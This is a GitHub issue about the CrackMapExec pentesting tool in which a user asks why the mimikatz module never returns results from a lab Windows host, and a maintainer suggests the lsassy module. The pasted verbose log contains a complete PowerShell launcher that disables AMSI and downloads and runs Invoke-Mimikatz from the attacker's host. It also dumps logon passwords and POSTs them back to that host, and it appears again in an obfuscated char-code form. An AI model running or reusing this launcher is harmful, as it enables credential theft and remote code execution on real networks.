byt3bl33d3r / CrackMapExec

A swiss army knife for pentesting networks
BSD 2-Clause "Simplified" License
8.45k stars 1.64k forks source link

Never get the POST request #501

Closed ymgh96 closed 2 years ago

ymgh96 commented 3 years ago

Detailed issue explanation

Hello I try to run mimikatz module with crackmapexec but it stuck after GET request and never get the POST request. Where am I wrong?

Steps to reproduce

  1. Turn off the firewall on victim
  2. Turn off the antivirus (windows defender) on victim

Command string used

crackmapexec --verbose smb 192.168.150.90 -u bob -p XXXX -d lab -M mimikatz --server-port 8080 --server http

CME verbose output (using the --verbose flag)

DEBUG Passed args:
{'aesKey': None,
 'amsi_bypass': None,
 'clear_obfscripts': False,
 'content': False,
 'continue_on_success': False,
 'cred_id': [],
 'darrell': False,
 'depth': None,
 'disks': False,
 'domain': 'lab',
 'exclude_dirs': '',
 'exec_method': None,
 'execute': None,
 'fail_limit': None,
 'force_ps32': False,
 'gen_relay_list': None,
 'get_file': None,
 'gfail_limit': None,
 'groups': None,
 'hash': [],
 'jitter': None,
 'kdcHost': None,
 'kerberos': False,
 'list_modules': False,
 'local_auth': False,
 'local_groups': None,
 'loggedon_users': False,
 'lsa': False,
 'module': 'mimikatz',
 'module_options': [],
 'no_bruteforce': False,
 'no_output': False,
 'ntds': None,
 'obfs': False,
 'only_files': False,
 'pass_pol': False,
 'password': ['XXXX'],
 'pattern': None,
 'port': 445,
 'protocol': 'smb',
 'ps_execute': None,
 'put_file': None,
 'regex': None,
 'rid_brute': None,
 'sam': False,
 'server': 'http',
 'server_host': '0.0.0.0',
 'server_port': 8080,
 'sessions': False,
 'share': 'C$',
 'shares': False,
 'show_module_options': False,
 'smb_server_port': 445,
 'spider': None,
 'spider_folder': '.',
 'target': ['192.168.150.90'],
 'threads': 100,
 'timeout': None,
 'ufail_limit': None,
 'username': ['bob'],
 'users': None,
 'verbose': True,
 'wmi': None,
 'wmi_namespace': 'root\\cimv2'}
DEBUG CME server type: http
DEBUG Using selector: EpollSelector
DEBUG Running
DEBUG Started thread poller
DEBUG Error creating SMBv1 connection to 192.168.150.90: Error occurs while reading from remote(104)
DEBUG Error creating SMBv1 connection to 192.168.150.90: Error occurs while reading from remote(104)
SMB         192.168.150.90  445    PC90             [*] Windows 10.0 Build 19041 x64 (name:PC90) (domain:lab) (signing:False) (SMBv1:False)
DEBUG add_credential(credtype=plaintext, domain=LAB, username=bob, password=XXXX, groupid=None, pillaged_from=None) => None
SMB         192.168.150.90  445    PC90             [+] lab\bob:XXXX (Pwn3d!)
DEBUG Generated PS IEX Launcher:
 [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'
IEX (New-Object Net.WebClient).DownloadString('http://192.168.150.2:8080/Invoke-Mimikatz.ps1')
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit'
$request = [System.Net.WebRequest]::Create('http://192.168.150.2:8080/')
$request.Method = 'POST'
$request.ContentType = 'application/x-www-form-urlencoded'
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd)
$request.ContentLength = $bytes.Length
$requestStream = $request.GetRequestStream()
$requestStream.Write($bytes, 0, $bytes.Length)
$requestStream.Close()
$request.GetResponse()

DEBUG Generated PS command:
 [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'
IEX (New-Object Net.WebClient).DownloadString('http://192.168.150.2:8080/Invoke-Mimikatz.ps1')
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit'
$request = [System.Net.WebRequest]::Create('http://192.168.150.2:8080/')
$request.Method = 'POST'
$request.ContentType = 'application/x-www-form-urlencoded'
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd)
$request.ContentLength = $bytes.Length
$requestStream = $request.GetRequestStream()
$requestStream.Write($bytes, 0, $bytes.Length)
$requestStream.Close()
$request.GetResponse()

DEBUG Target system is 192.168.150.90 and isFDQN is False
DEBUG StringBinding: pc90[65356]
DEBUG StringBinding: 172.16.70.30[65356]
DEBUG StringBinding: 192.168.150.90[65356]
DEBUG StringBinding chosen: ncacn_ip_tcp:192.168.150.90[65356]
DEBUG Executed command via wmiexec
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " INVOKe-eXpressION (-jOiN ('91&78r101j116j46{83~101z114r118{105f99j101B80~111~105{110~116j77{97f110S97{103B101S114&93{58f58S83~101S114r118f101B114B67{101j114S116{105B102&105r99r97&116j101{86z97j108j105{100S97j116f105r111~110r67f97&108{108f98j97&99j107f32&61j32{123~36j116{114z117&101r125{10B116&114S121B123f10r91{82{101j102B93f46B65r115j115~101&109&98&108~121r46z71&101j116S84{121{112&101{40B39S83&121S115S39&43f39z116f101S109j46&77f97S110j39{43j39z97{103{101S109{101S110S116j46{65z117{116{39f43&39{111~109r97&116f105f111{110&46{65S109j39S43j39S115&105B85S116j39S43&39B105f108B115B39~41j46{71{101r116f70&105j101z108~100&40~39r97B109~39{43&39f115r105~73j110B105z39f43f39~116{70B97{105f108B101r100r39z44{32{39&78{111j110B80r39r43j39z117{98j108j105B99S44S83B116S97S39{43B39z116~105{99{39{41B46{83S101f116z86B97&108B117{101r40j36B110z117f108S108j44z32f36r116B114&117f101z41{10~125~99S97S116&99f104~123~125&10~91z78r101r116j46B83j101r114B118r105r99z101{80&111S105B110f116S77B97&110B97z103B101S114{93j58S58j83{101{114r118{101r114r67{101j114z116z105&102~105f99f97{116S101f86S97{108{105j100j97r116B105z111B110r67~97j108z108S98z97{99B107&32r61&32~123j36&116S114~117r101r125r10&91B83S121{115r116r101z109r46z78~101{116~46&83&101j114B118j105S99S101S80r111z105&110r116&77{97z110~97z103z101f114j93j58{58&83{101{99B117&114j105~116r121B80~114z111~116{111S99S111&108f32r61{32B91j83z121j115j116S101r109f46&78S101&116z46r83j101{99&117~114S105S116f121B80&114z111z116&111B99S111{108f84{121{112r101j93B39r83~115~108&51~44~84~108j115f44S84B108&115{49z49{44{84r108r115r49r50{39S10~73r69&88f32f40{78{101&119z45{79S98r106{101~99j116z32B78~101B116~46~87B101{98S67~108f105j101{110&116f41r46f68j111{119f110{108{111~97&100{83r116z114S105z110B103~40~39f104S116f116r112r58f47S47r49{57j50z46f49S54{56B46B49B53{48&46z50r58f56&48~56{48S47r73S110f118r111r107z101z45&77{105f109z105S107j97{116f122S46B112j115~49B39z41z10j36&99{109z100r32&61&32B73z110{118j111j107j101j45{77&105f109&105S107f97j116S122~32{45z67S111z109~109{97z110~100z32{39z112S114S105&118~105~108S101{103B101f58{58z100j101&98z117{103S32&115~101f107z117r114&108{115f97j58~58{108{111&103j111r110z112~97z115f115j119&111j114{100f115r32S101{120f105z116z39f10{36~114{101f113z117j101r115B116S32B61&32&91f83&121B115f116~101r109~46j78{101f116&46B87S101~98f82z101r113r117~101~115&116S93z58S58~67r114f101&97B116{101S40~39B104r116&116r112B58{47S47z49&57S50{46&49&54z56r46z49r53~48j46{50j58S56&48r56{48B47z39{41r10&36&114&101{113~117B101{115S116{46r77z101f116{104{111~100S32r61~32r39r80j79f83{84B39&10{36j114j101r113B117j101&115~116B46z67B111z110j116{101{110{116&84j121B112S101z32{61f32j39{97&112~112&108{105z99r97z116&105j111j110S47B120z45j119~119r119r45S102{111r114~109{45j117&114f108j101f110&99{111~100r101r100z39{10B36f98S121B116~101r115{32r61~32f91r83{121r115~116~101~109B46{84&101&120z116z46{69B110B99S111B100f105f110r103~93z58B58f65B83&67r73z73j46z71r101{116{66f121S116~101f115r40&36{99j109S100S41B10j36z114f101r113{117~101z115{116B46{67{111z110{116j101z110S116f76&101f110z103j116B104r32{61&32B36j98S121~116B101r115{46{76j101{110B103j116r104{10j36{114z101~113r117r101{115{116{83f116{114f101~97r109z32f61r32{36z114&101z113B117S101{115z116S46j71B101~116j82{101f113j117B101&115&116B83~116z114B101r97z109~40B41S10z36~114{101{113{117~101z115B116S83&116r114B101j97f109{46j87j114~105j116j101z40B36S98{121f116{101r115z44r32r48f44{32r36r98{121j116B101r115{46~76B101{110S103r116S104&41z10f36j114r101{113&117z101r115{116{83{116r114j101j97B109~46S67{108~111B115{101j40f41{10z36z114f101f113&117f101S115{116j46S71{101B116j82z101{115r112{111B110r115{101r40S41'.sPLit('Bf&Sj~z{r{') |FoReAcH-ObjeCt { ( [ChAr] [inT] $_) }) )"
MIMIKATZ    192.168.150.90  445    PC90             [+] Executed launcher
DEBUG Stopped thread poller
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ    192.168.150.90                          [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)

CME Version (cme --version)

Version: 5.1.7dev Codename: U fancy huh?

OS

Kali 2021.3 Linux 5.10.0-kali9-amd64

Target OS

Windows 10 Version 21H1 (OS Build 19043.1288)

mpgn commented 3 years ago

Mimikatz module is old and deprecated, try with lsassy module !